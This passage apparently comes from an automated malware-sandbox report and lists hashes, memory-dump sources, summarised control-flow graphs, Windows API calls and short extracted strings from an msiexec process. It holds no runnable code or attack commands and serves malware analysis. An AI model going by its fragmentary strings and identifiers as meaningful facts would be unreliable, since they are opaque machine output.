                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5823c35e6ae807b15a72fb61081f219cb58856c63e7e6ef7bad8a591d944e2fe
                                                                              • Instruction ID: 5602946076de8a181b7ed9ea36bb5f47e41cc2ba7eb423cbabe96bdf449bb2ef
                                                                              • Opcode Fuzzy Hash: 5823c35e6ae807b15a72fb61081f219cb58856c63e7e6ef7bad8a591d944e2fe
                                                                              • Instruction Fuzzy Hash: 8BA192B5E012298FEB68CF6AC945B9DBBF2BF88300F14C1E9D408A7255DB745A85CF11
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 24f2949914278ad2ae5b9adc3688534954ef19444391a9d342efd402d3c3aa29
                                                                              • Instruction ID: a781aaf5543238eeae4a8e472698d3c77c6d0cc268ebbfbc3e288f2c4a4f0b49
                                                                              • Opcode Fuzzy Hash: 24f2949914278ad2ae5b9adc3688534954ef19444391a9d342efd402d3c3aa29
                                                                              • Instruction Fuzzy Hash: 359107B0E40218CFDB10DFA4C994BDCBBB1FF49310F2092A9E509AB291DB759985CF10
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b1b957a861074c7bec2e9bc4156490ba5f506c532452eaf919f042f23bb6adad
                                                                              • Instruction ID: e1bfa58bcbe2d99a0db615a6602b01a342c77344ea74c8581d2a3f41f1f3f712
                                                                              • Opcode Fuzzy Hash: b1b957a861074c7bec2e9bc4156490ba5f506c532452eaf919f042f23bb6adad
                                                                              • Instruction Fuzzy Hash: 8381CFB4E00218CFDB04DFA9C994B9DBBB6FF88300F608569D805AB3A9DB395945CF54
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 99b9a782ce749992338e8ecb709fe761c29b045b1e85ba24c6cf55861dbcb1b2
                                                                              • Instruction ID: d42ca785b733280ea292233c24c25e1b0f108a8beb848bdc0a5a30ff5fa62b9f
                                                                              • Opcode Fuzzy Hash: 99b9a782ce749992338e8ecb709fe761c29b045b1e85ba24c6cf55861dbcb1b2
                                                                              • Instruction Fuzzy Hash: 4E71B175E01228CFDB64CF66C9847DDBBF2BB89301F1491AAD808A7264DB349A85CF40
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: addb8111bf8c4044fac8b4573b8d3ea2e27b2bef6abc144df499c4ad2903b386
                                                                              • Instruction ID: 3c9481a94348f6a54ad14c71d6188da7943ca3773fe85d6bc1446e0baf705056
                                                                              • Opcode Fuzzy Hash: addb8111bf8c4044fac8b4573b8d3ea2e27b2bef6abc144df499c4ad2903b386
                                                                              • Instruction Fuzzy Hash: D47195B5E016198FEB68CF6AC944B9EBBF2BF88300F14C1E9D408A7254DB744A85CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 851f0ab2e6d115a9763c8669d68bf1a48cb74ddb27aeeb40658b08723bd91890
                                                                              • Instruction ID: 86c15eb1c8b4c7cc9703487806066f628bf7aa69985a4990e29f99bea6be0f7b
                                                                              • Opcode Fuzzy Hash: 851f0ab2e6d115a9763c8669d68bf1a48cb74ddb27aeeb40658b08723bd91890
                                                                              • Instruction Fuzzy Hash: 2951B674E00208DFDB18DFAAD994A9DBBB6FF88300F24C529E815AB3A5DB355845CF14
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1d36356742e01ec5ec29eedd407e42da0ccb678c99343fc820d4a6191f7eefc0
                                                                              • Instruction ID: 11661c2a4a8a4a4b307961cc8029eddc594bd3ece519e52775cc5d2a35e5b4d4
                                                                              • Opcode Fuzzy Hash: 1d36356742e01ec5ec29eedd407e42da0ccb678c99343fc820d4a6191f7eefc0
                                                                              • Instruction Fuzzy Hash: F84158B1E016188BEB58CF5BC94479EFAF7AFC9300F14C5A9D50CA7264EB740A858F51
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6dacdca8b33c8a609bd2744e5756ccb30826d65491a1942a55610e541a01bc86
                                                                              • Instruction ID: 509748182cfcc9a4d11f6790ca6b2c8d1bed6f28ef3972283b448c641e015da8
                                                                              • Opcode Fuzzy Hash: 6dacdca8b33c8a609bd2744e5756ccb30826d65491a1942a55610e541a01bc86
                                                                              • Instruction Fuzzy Hash: FC41D4B4E05248CFDB18CFAAC5546DDBBF2BF89301F20D16AD415AB269DB385945CF04

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 24B42426
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285466256.0000000024B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 24B40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24b40000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID: d]X$d]X
                                                                              • API String ID: 4139908857-1355647457
                                                                              • Opcode ID: 1c17909d61ed713e8045060abff32bd7ab7749fa5516f9a294b37ee635be8ee1
                                                                              • Instruction ID: 54dc5344cb7f6cbe5e9c2f98e582248cdc68eebc863b78aa6d27981bd806e467
                                                                              • Opcode Fuzzy Hash: 1c17909d61ed713e8045060abff32bd7ab7749fa5516f9a294b37ee635be8ee1
                                                                              • Instruction Fuzzy Hash: 6B715270E00B058FDB28CF69D05079ABBF1FF88340F008A2AD58ADBA61D735E945DB91

                                                                              Control-flow Graph

                                                                               control_flow_graph: function 24973ae1 [graph data omitted; basic blocks 24973ae1-24973e78; calls 24974284]
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Hnq$Hnq$Hnq
                                                                              • API String ID: 0-1699790779
                                                                              • Opcode ID: c6d7e7d962894eabcdd80b1ac1a785eeece87b6fafa31297a598381565b8527f
                                                                              • Instruction ID: 482de48dcc19e2d36d0f3b7a34deaa5cf13ed6c5d672db93314fce45ca44e019
                                                                              • Opcode Fuzzy Hash: c6d7e7d962894eabcdd80b1ac1a785eeece87b6fafa31297a598381565b8527f
                                                                              • Instruction Fuzzy Hash: D2A1E170B842449FCB259B78949966E3BB6FFC5320F108699E916CB3D2CF798D02C751

Control-flow Graph

Control-flow graph: basic blocks spanning 5b64d2-5b6736 (first listed block 5b64e0), no calls (interactive graph rendering and executed/not-executed colouring not reproduced).
Strings
Memory Dump Source
• Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
Similarity
• API ID:
• String ID: ,nq$,nq
• API String ID: 0-3932345633
• Opcode ID: e5b93a00dcf2b950c799086d92626bc1bbdd6c75deddea6246869f6e46e8b43e
• Instruction ID: 7dd5a3ab0cd86263603c0dfc08b01f6205bafe37dde49a7a6006395444a788d1
• Opcode Fuzzy Hash: e5b93a00dcf2b950c799086d92626bc1bbdd6c75deddea6246869f6e46e8b43e
• Instruction Fuzzy Hash: FE715874A005058FCB24CF68C4989E9BFB2FF89311B658569D406EB3A5DB39FC41CB61

Control-flow Graph

Control-flow graph: basic blocks 5b5f5c-5b62ec, with call sites resolving to 5b5f5c or 5b60a0 (at 5b5fba), 5bafad or 5baf64 (at 5b6011) and 5b62f8 or 5b6300 (at 5b6167) (interactive graph rendering and executed/not-executed colouring not reproduced).
Strings
Memory Dump Source
• Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
Similarity
• API ID:
• String ID: Hnq$Hnq
• API String ID: 0-3075287205
• Opcode ID: 33c87d24fd7e26f37819e93c83a7fc9dc88a7d4cf05a1cffd247091a387c0a3d
• Instruction ID: 3701e189722f5109af51e82c3588af9872967bac668ad235e3948dddec1f36cd
• Opcode Fuzzy Hash: 33c87d24fd7e26f37819e93c83a7fc9dc88a7d4cf05a1cffd247091a387c0a3d
• Instruction Fuzzy Hash: C251E0353042558FDB269F29C858BBE7FF2BF89300F144969E4468B291DB3ADC02DB91

Control-flow Graph

Control-flow graph: basic blocks 249742d0-249744cd, with one call to 249744cf (at 249743c7) (interactive graph rendering and executed/not-executed colouring not reproduced).
Strings
Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID: 8oq$TJoq
• API String ID: 0-426483906
• Opcode ID: 0072a3acc290bd88dbe56e67eee23b7cc1ce8008387e79f504cf7124de7ac07b
• Instruction ID: 2aeb6826d1fccf6958bfe98e4b7b14e87948bc8f160df7aba9cc14884bec3c83
• Opcode Fuzzy Hash: 0072a3acc290bd88dbe56e67eee23b7cc1ce8008387e79f504cf7124de7ac07b
• Instruction Fuzzy Hash: 81413974A001098FCB05DBA8C584EDDBBFAFF89320F155194E505AB3A6CB71ED85CBA0

Control-flow Graph

Control-flow graph: basic blocks 249742bf-249744cd, with one call to 249744cf (at 249743c7) (interactive graph rendering and executed/not-executed colouring not reproduced).
Strings
Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID: 8oq$TJoq
• API String ID: 0-426483906
• Opcode ID: b51291be69d6636083a88fcedc6cd7cea04d250003a3a027c9402f708c871d4c
• Instruction ID: 13722a628e752cdd35e0257285f7ba35a41fbd0500660c06e687d3d1e397d94a
• Opcode Fuzzy Hash: b51291be69d6636083a88fcedc6cd7cea04d250003a3a027c9402f708c871d4c
• Instruction Fuzzy Hash: DD416975A001058FCB05DBA8C580EDEBBFAFF88320F155194E505AB3A6CB70ED85CB90

Control-flow Graph

Control-flow graph: basic blocks 24974351-249744cd, no calls (interactive graph rendering and executed/not-executed colouring not reproduced).
Strings
Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID: 8oq$TJoq
• API String ID: 0-426483906
• Opcode ID: 5c4f496af4dca450aad94594db502b8c508ff2a4cfa4d622fd8573df8a85c5ac
• Instruction ID: cb18062c5bc9457c705d8c7caf7845c385d7e1f8a3bc84c84f70aeb32b7c4329
• Opcode Fuzzy Hash: 5c4f496af4dca450aad94594db502b8c508ff2a4cfa4d622fd8573df8a85c5ac
• Instruction Fuzzy Hash: 78313570B401098FCB04DBA8C581E9EBBF6FF88320F195590E505AB3B6CA70ED85CB50

Control-flow Graph

Control-flow graph: basic blocks 24974385-249744cd, no calls (interactive graph rendering and executed/not-executed colouring not reproduced).
Strings
Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID: 8oq$TJoq
• API String ID: 0-426483906
• Opcode ID: 8b8bd74f560f9623a22d648ca42208eb588c6519eb6f587cf9acb8b8a4c107ac
• Instruction ID: 79f8cdd1b082e836a2b36d2e72d1ac5ef9f6bf514384fa470420a535d62bf3fb
• Opcode Fuzzy Hash: 8b8bd74f560f9623a22d648ca42208eb588c6519eb6f587cf9acb8b8a4c107ac
• Instruction Fuzzy Hash: 85313770B401098FCB05DBA8C580E9EBBFAFF88320F155594E505AB376CA71ED85CB91

Control-flow Graph

Control-flow graph: basic blocks spanning 2497491c-249749d7 (first listed block 24974928), with one call site at 249749c9 resolving to 24974a40 or 249749ea (interactive graph rendering and executed/not-executed colouring not reproduced).
Strings
Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID: Hnq$M/NP
• API String ID: 0-1803747802
• Opcode ID: 77de2a584763bd363f0eb5394b7874a4d1f87e2f1829f7a08145bc017b14073a
• Instruction ID: c894f26de62edfa6ac3958e2174478550dd86339228465231d4a26c2c9fbec34
• Opcode Fuzzy Hash: 77de2a584763bd363f0eb5394b7874a4d1f87e2f1829f7a08145bc017b14073a
• Instruction Fuzzy Hash: DC212335B05249DFC7069B68C85466D7FB6EFCA311B2480BAE4048B363CA344D07C711

Control-flow Graph

Control-flow graph: basic blocks 5b0ca0-5b17aa, with calls to 5b0780 (14 times), 5b27f7, 5b40f1 or 5b41a0 (one call site at 5b1092), and 5b5362 (twice) (interactive graph rendering and executed/not-executed colouring not reproduced).
Strings
Memory Dump Source
• Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
Similarity
• API ID:
• String ID: LRjq
• API String ID: 0-665714880
• Opcode ID: 0a408318eca05929846fc45d37297a24f009679c105a27806690c2fb48fd142b
• Instruction ID: b2191275250ad5b1ced019895d5eeffcc5384d65dab63be2067f429dac30f943
• Opcode Fuzzy Hash: 0a408318eca05929846fc45d37297a24f009679c105a27806690c2fb48fd142b
• Instruction Fuzzy Hash: 2452F878940219CFCB54DF24D999A9DBBB6FF48301F1086A5D80DAB368DB746E85CF80

Control-flow Graph

Control-flow graph: basic blocks 24b443a4-24b44521, with a CreateWindowExW call in block 24b44473-24b444d2 (interactive graph rendering and executed/not-executed colouring not reproduced).
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 24B444C2
Memory Dump Source
• Source File: 00000005.00000002.3285466256.0000000024B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 24B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24b40000_msiexec.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 20ddcca392a71d0b61a22cd35af9c7844baa38f841976c1bc5c7ce7305c37f6c
• Instruction ID: 7ddf099c928f2f9506fb1e2fe8398443adc37585ec70212ec77420be225682d7
• Opcode Fuzzy Hash: 20ddcca392a71d0b61a22cd35af9c7844baa38f841976c1bc5c7ce7305c37f6c
• Instruction Fuzzy Hash: 8251D0B1D103499FDB14CF9AC990ADEBBF5FF48310F20812AE419AB214D7749881CF90

Control-flow Graph

Control-flow graph: basic blocks 24b4186c-24b44521, with a CreateWindowExW call in block 24b44433-24b444d2 (interactive graph rendering and executed/not-executed colouring not reproduced).
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 24B444C2
Memory Dump Source
• Source File: 00000005.00000002.3285466256.0000000024B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 24B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24b40000_msiexec.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: b60f62c995b3b3770099b69b9e6d7b9a5cf5c8d55046cfeb8ca3a65aca6fac53
• Instruction ID: 2da5035ef4c7ad1d9e0770ba4e32ea05574ae713dd7d70b9137f7a9fcbef3dfe
• Opcode Fuzzy Hash: b60f62c995b3b3770099b69b9e6d7b9a5cf5c8d55046cfeb8ca3a65aca6fac53
• Instruction Fuzzy Hash: 3251C0B1D103499FDF14CF9AD994ADEBBB5FF48310F20812AE918AB214D774A841CF90

Control-flow Graph

Control-flow graph: basic blocks 24b46b42-24b46c1c, with a CallWindowProcW call in block 24b46b9a-24b46bd2 (interactive graph rendering and executed/not-executed colouring not reproduced).
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 24B46BC1
Memory Dump Source
• Source File: 00000005.00000002.3285466256.0000000024B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 24B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24b40000_msiexec.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: 371e45ecbf67bffbe34e25a473da16d4b81b6cf047d757e6926da88be2f7b2b0
• Instruction ID: 257f0e59588d17a070420d2bfc40538a4a3657a5552d56777bedfb8170f71948
• Opcode Fuzzy Hash: 371e45ecbf67bffbe34e25a473da16d4b81b6cf047d757e6926da88be2f7b2b0
• Instruction Fuzzy Hash: 332149B9900305CFCB04CFA4C498B9ABBF5FF89714F20C549D519AB321C378A880DBA0

Control-flow Graph

[Control-flow graph: basic blocks 24b423c0-24b42450; GetModuleHandleW is called from block 24b42408-24b42433]
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 24B42426
Memory Dump Source
• Source File: 00000005.00000002.3285466256.0000000024B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 24B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24b40000_msiexec.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 054bdccaf7982ba74b504c589b6d7d4abf032a02a597f1cdba0b0eb2c6bae066
• Instruction ID: 57f6af2f810f7d7e008d4a2e5a181d398dc417388e65a8f1d4903e8ed2d852a2
• Opcode Fuzzy Hash: 054bdccaf7982ba74b504c589b6d7d4abf032a02a597f1cdba0b0eb2c6bae066
• Instruction Fuzzy Hash: DB110CB6C002498FCB14CF9AD544A9EFBF4EF89220F10842ADA28B7210C379A545CFA1

APIs
• OleInitialize.OLE32(00000024), ref: 24B4908D
Memory Dump Source
• Source File: 00000005.00000002.3285466256.0000000024B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 24B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24b40000_msiexec.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: 77573e42207c7d998aa4a068d9920606102669530027a40d86eb075af3c761e2
• Instruction ID: 2277728060d6c983420030ebf40443a3d350f9ded12a57f90f17c639cea28d11
• Opcode Fuzzy Hash: 77573e42207c7d998aa4a068d9920606102669530027a40d86eb075af3c761e2
• Instruction Fuzzy Hash: 7611E2B59003498FDB20DFAAD584BDEBBF4EB49320F20845AD559A7310C379A584CFA5

APIs
• OleInitialize.OLE32(00000024), ref: 24B4908D
Memory Dump Source
• Source File: 00000005.00000002.3285466256.0000000024B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 24B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24b40000_msiexec.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: 7184dd6c04a3b2c45710b59e1079cccd111ede2f31195e13d60073eb8c60d4b9
• Instruction ID: d1b846c461681d20ae5daa243726c7fcd9243c357b4bd7adad85a4239739bd13
• Opcode Fuzzy Hash: 7184dd6c04a3b2c45710b59e1079cccd111ede2f31195e13d60073eb8c60d4b9
• Instruction Fuzzy Hash: EF11E2B59003498FDB20DFAAD544B9EBBF4EB49320F20845AD558A7310C379A584CFA5

Strings
Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID: Hnq
• API String ID: 0-2896580000
• Opcode ID: 9cf29bc16e1146a85af32c3479d430368a4f22d35bc7d2d3c7b3677181b74bbc
• Instruction ID: b565cfbac71ef4748d34f22a5c8fa972fbdd8df9e0528e6177a2086820a9414c
• Opcode Fuzzy Hash: 9cf29bc16e1146a85af32c3479d430368a4f22d35bc7d2d3c7b3677181b74bbc
• Instruction Fuzzy Hash: 31318071B002099FCB54DBB8D855AAE7FB6AFD9211F1080BEE509D7256DE348902C790

Memory Dump Source
• Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9b5108d26d4e7dcf50bb201a4f0eca42b5227529bc0c611075894d901631f34b
• Instruction ID: c389475e78a40cb13160b38aa530a4cadde635b2d17b9df9639ba9e173b4b2c3
• Opcode Fuzzy Hash: 9b5108d26d4e7dcf50bb201a4f0eca42b5227529bc0c611075894d901631f34b
• Instruction Fuzzy Hash: 4912A47C0A16879FE6512B34D6BC16ABEA1FB5F363720AC00E51BD5045EB3D048A9B62

Memory Dump Source
• Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 26bab87f251cbd814e32bed97f51d6ec9fc8f401fcff216246ee51bc589299ac
• Instruction ID: d0143811eef1a190dbcce3ecf216bd52ed766575e49ce73f0ad724bc6a598ed2
• Opcode Fuzzy Hash: 26bab87f251cbd814e32bed97f51d6ec9fc8f401fcff216246ee51bc589299ac
• Instruction Fuzzy Hash: 1AB12D78280314DFD706AB65D65BB153FABFB8C310F204E18AD01137AD8A7D6899DE1A

Memory Dump Source
• Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 22652526159776aca94954f8d0ee9ef427e31da1434b867af154a2270c6e2456
• Instruction ID: 9cb0df8ad11d6f5a52c856bf1d37e39da03a234fc683d015a1166c7928b00a77
• Opcode Fuzzy Hash: 22652526159776aca94954f8d0ee9ef427e31da1434b867af154a2270c6e2456
• Instruction Fuzzy Hash: FA61D1347042118FDB159B3988687BABFA6BFC4351F148529D506CB3A5DF39EC42D781

Memory Dump Source
• Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e5994d1cdf525caac218f79bd2091c911881a490d52a0e0349c8c5fc7628866e
• Instruction ID: 6046052d98add5c93477b4ea5a0ad5dcafdf10e7ecfb24609aad8c1b54b0ffa5
• Opcode Fuzzy Hash: e5994d1cdf525caac218f79bd2091c911881a490d52a0e0349c8c5fc7628866e
• Instruction Fuzzy Hash: A3815A74E44348CFCB05DFA8D8948DDBBB2FF89310B24856AD805AB366D739A846CF51

Memory Dump Source
• Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 060bab64effa25cb4d7ac09eaadf08280ee8208b6f8d7356fd3d64f6bd154e2e
• Instruction ID: c0cf784896408bb9798ffb40811985723972db92854830a63be30fc1c3ea213e
• Opcode Fuzzy Hash: 060bab64effa25cb4d7ac09eaadf08280ee8208b6f8d7356fd3d64f6bd154e2e
• Instruction Fuzzy Hash: 4A51B578E01318CFCB08DFA9D58599DBBF2FF89300B209569E805AB369DB35A845CF50

Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4aafa3ea37178e9ae1a80355a1450614583748011776857f832ef802e9eec746
• Instruction ID: 385989a289681c3c03cb47be785a0928c921859eeaca631b145d07165361045e
• Opcode Fuzzy Hash: 4aafa3ea37178e9ae1a80355a1450614583748011776857f832ef802e9eec746
• Instruction Fuzzy Hash: 1951ADB4E01228CFCB65DF64C988BDDBBB6BB89301F1055EAD409A7354D735AA85CF10

Memory Dump Source
• Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ebaaf0115a555219f9b8c9459827bbb857e0f5c230b287b5646f2cfcd34bff05
• Instruction ID: 77b900d25bbfb66714fb5b86d4dd10c177935a2f0fa1f141337e54f4cc66e379
• Opcode Fuzzy Hash: ebaaf0115a555219f9b8c9459827bbb857e0f5c230b287b5646f2cfcd34bff05
• Instruction Fuzzy Hash: 8E318F3530510ADFCF199F64D898AAE3FA2FB88351F108424F91987254DB3ADD22EB91

Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7ac301af64869f3846bcc258b8160be699f0e6093117141e7d256dfa7395ef44
• Instruction ID: df11fd89930ffe625f2fb42bd0ea8b5d72cffa708c4b72f5756ab26eaf1ef2e1
• Opcode Fuzzy Hash: 7ac301af64869f3846bcc258b8160be699f0e6093117141e7d256dfa7395ef44
• Instruction Fuzzy Hash: EE31C2B4E00218CBDB18DFAAD8406DDBBF2BF89300F54D12AD819BB269DB345942CF54

Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: abaf62177981ec5e211710f6d69ff181d58c7ae8d59a6d89586ca88055d8295e
• Instruction ID: 24012f61f5d8ae6378c2ed2b26e268a579e5a2f18b747528ca17b9329d421cc0
• Opcode Fuzzy Hash: abaf62177981ec5e211710f6d69ff181d58c7ae8d59a6d89586ca88055d8295e
• Instruction Fuzzy Hash: 5631CE75E01219DFCB45CF68C844A9EFBB1FF8A325B1481AAD419EB312E7319811CF80

Memory Dump Source
• Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c1eff4dd01b65723b0c400a6ad93e7bafcd2daaeae9669f32f5960479970e7b3
